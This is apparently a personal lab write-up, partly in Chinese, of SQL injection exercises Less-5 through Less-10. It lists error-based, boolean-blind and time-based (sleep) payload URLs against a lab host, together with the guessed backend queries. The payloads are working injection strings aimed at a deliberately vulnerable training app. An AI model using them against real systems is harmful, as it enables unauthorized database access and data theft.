Less5
GET - Double Injection - Single Quotes
http://10.10.202.112/sqli/Less-5?id=1
http://10.10.202.112/sqli/Less-5?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
http://10.10.202.112/sqli/Less-5?id=1"
You are in...........
猜测SQL语句为:
select login_name,password from table_name where id='$id' limit 0,1
构造payload
http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=4--+ #false
http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=5--+ #true
Less-6
GET - Double Injection - Double Quotes
http://10.10.202.112/sqli/Less-6?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
猜测SQL语句应该为:
select login_name,password from table_name where id="$id" limit 0,1
http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=4--+ #false
http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=5--+ #true
http://10.10.202.112/sqli/Less-6?id=1" and sleep(5) and "s"="s
Less-7
GET - Dump into outfile - String
看了源码SQL语句为:
SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1
构造payload
http://10.10.202.112/sqli/Less-7?id=1')) and sleep(5) -- -
http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=4--+ #false
http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=5--+ #true
Less-8
GET - Blind - Boolian Based - Single Quotes
http://10.10.202.112/sqli/Less-8?id=1' #false
http://10.10.202.112/sqli/Less-8?id=1'--+ #true
猜测SQL:
SELECT * FROM users WHERE id='$id' LIMIT 0,1
http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='z' --+ #false
http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='r' --+ #true
Less-9
GET - Blind - Time based. - Single Quotes
源代码SQL
SELECT * FROM users WHERE id='$id' LIMIT 0,1
payload:
http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=4 and sleep(5)--+
http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=5 and sleep(5)--+
Less-10
GET - Blind - Time based - double quotes
http://10.10.202.112/sqli/Less-10?id=1" and 1=1 and sleep(5)--+
http://10.10.202.112/sqli/Less-10?id=1" and 1=2 and sleep(5)--+
经验首页